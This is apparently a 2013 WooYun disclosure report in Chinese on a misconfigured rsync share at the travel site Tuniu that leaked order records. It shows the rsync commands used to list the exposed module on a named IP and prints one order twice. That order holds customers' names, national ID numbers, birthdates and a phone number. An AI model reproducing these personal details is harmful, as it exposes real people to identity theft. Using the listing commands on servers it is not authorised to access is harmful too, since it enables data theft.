当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041126

漏洞标题:途牛运维配置不当导致订单信息泄漏

相关厂商:途牛旅游网

漏洞作者: 盈盈无绪

提交时间:2013-10-28 12:50

修复时间:2013-12-12 12:51

公开时间:2013-12-12 12:51

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-28: 细节已通知厂商并且等待厂商处理中
2013-10-28: 厂商已经确认,细节仅向厂商公开
2013-11-07: 细节向核心白帽子及相关领域专家公开
2013-11-17: 细节向普通白帽子公开
2013-11-27: 细节向实习白帽子公开
2013-12-12: 细节向公众公开

简要描述:

途牛的一台服务器的rsync配置不当导致大量订单信息泄漏

详细说明:

rsync 58.68.255.50::whh/
drwxr-xr-x       24576 2013/10/26 08:33:53 .
drwxr-xr-x        4096 2012/04/26 16:23:15 2011-08-03
drwxr-xr-x        4096 2012/04/26 19:21:26 2011-08-05
drwxr-xr-x        4096 2012/04/28 20:27:32 2011-10-12
drwxr-xr-x        4096 2012/04/26 16:23:24 2011-12-12
drwxr-xr-x        4096 2012/05/23 09:53:41 2011-12-13
drwxr-xr-x        4096 2012/05/17 09:15:57 2011-12-21
drwxr-xr-x        4096 2012/04/27 10:08:46 2012-01-21


drwxr-xr-x      241664 2013/10/23 07:12:23 2013-10-22
drwxr-xr-x      188416 2013/10/24 05:37:36 2013-10-23
drwxr-xr-x      204800 2013/10/25 07:45:11 2013-10-24
drwxr-xr-x      188416 2013/10/26 07:23:56 2013-10-25
drwxr-xr-x       57344 2013/10/27 06:44:43 2013-10-26
drwxrwxr-x        4096 2013/06/14 17:25:10 css
drwxrwxr-x        4096 2013/08/01 16:14:16 images


rsync 58.68.255.50::whh/ | wc -l
     640


看看某天的是啥

rsync 58.68.255.50::whh/2013-10-25/ | more
drwxr-xr-x      188416 2013/10/26 07:23:56 .
-rw-r--r--        3943 2013/10/25 22:02:03 flightOrderConfirm_applyId-131118_1382680807857.html
-rw-r--r--        4017 2013/10/26 00:35:37 flightOrderConfirm_applyId-131293_1382690021756.html
-rw-r--r--        3856 2013/10/26 00:32:37 flightOrderConfirm_applyId-131416_1382689841176.html
-rw-r--r--        3859 2013/10/26 00:33:08 flightOrderConfirm_applyId-132212_1382689872619.html
-rw-r--r--        3843 2013/10/25 22:16:27 flightOrderConfirm_applyId-132368_1382681671634.html
-rw-r--r--        3861 2013/10/25 23:06:40 flightOrderConfirm_applyId-132413_1382684684496.html
-rw-r--r--        3859 2013/10/25 18:41:08 flightOrderConfirm_applyId-132500_1382668752284.html
-rw-r--r--        4001 2013/10/25 21:45:48 flightOrderConfirm_applyId-132567_1382679832300.html
-rw-r--r--        3864 2013/10/25 22:53:47 flightOrderConfirm_applyId-132594_1382683911599.html
-rw-r--r--        3855 2013/10/25 23:12:15 flightOrderConfirm_applyId-132723_1382685019379.html
-rw-r--r--        4017 2013/10/25 18:42:19 flightOrderConfirm_applyId-132741_1382668822864.html


看看一天能有多少

rsync 58.68.255.50::whh/2013-10-25/ | wc -l
2334


看看内容是啥

TO :	新浙风旅游	FROM:	上海途牛国际旅行社有限公司 计调:王静5
电话:	021-62077001
15605758111	电话:	025-68237777-88919
联系人:	楼文华(总经理)	传真:	025-86853999
传真:	02162077020	手机:	
订单编号:2888089
线路名:<雁荡全景-龙穿飞瀑3日游>含门票,1晚住开元大酒店
供应商线路编号:
供应商线路名:
本采购单成人数:2	本采购单儿童数:0
出发日期:2013-11-08	结算价:960.00
客人信息:	
王舜华 女 身份证 310106195511062043 签发地 请选择 签注类型 G签 生日 1955-11-06 
苑玉杰 男 身份证 310106195305152013 签发地 请选择 签注类型 G签 生日 1953-05-15
客人联系方式:	王舜华 18916678209
备注:	
签约方式:在线签约;签约时间 :2013-10-25 09:00:00-2013-10-25 11:00:00;签约地点:上海,上海途牛国际旅行社有限公司;


漏洞证明:

TO :	新浙风旅游	FROM:	上海途牛国际旅行社有限公司 计调:王静5
电话:	021-62077001
15605758111	电话:	025-68237777-88919
联系人:	楼文华(总经理)	传真:	025-86853999
传真:	02162077020	手机:	
订单编号:2888089
线路名:<雁荡全景-龙穿飞瀑3日游>含门票,1晚住开元大酒店
供应商线路编号:
供应商线路名:
本采购单成人数:2	本采购单儿童数:0
出发日期:2013-11-08	结算价:960.00
客人信息:	
王舜华 女 身份证 310106195511062043 签发地 请选择 签注类型 G签 生日 1955-11-06 
苑玉杰 男 身份证 310106195305152013 签发地 请选择 签注类型 G签 生日 1953-05-15
客人联系方式:	王舜华 18916678209
备注:	
签约方式:在线签约;签约时间 :2013-10-25 09:00:00-2013-10-25 11:00:00;签约地点:上海,上海途牛国际旅行社有限公司;

修复方案:

安全配置

版权声明:转载请注明来源 盈盈无绪@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-10-28 13:43

厂商回复:

多谢

最新状态:

暂无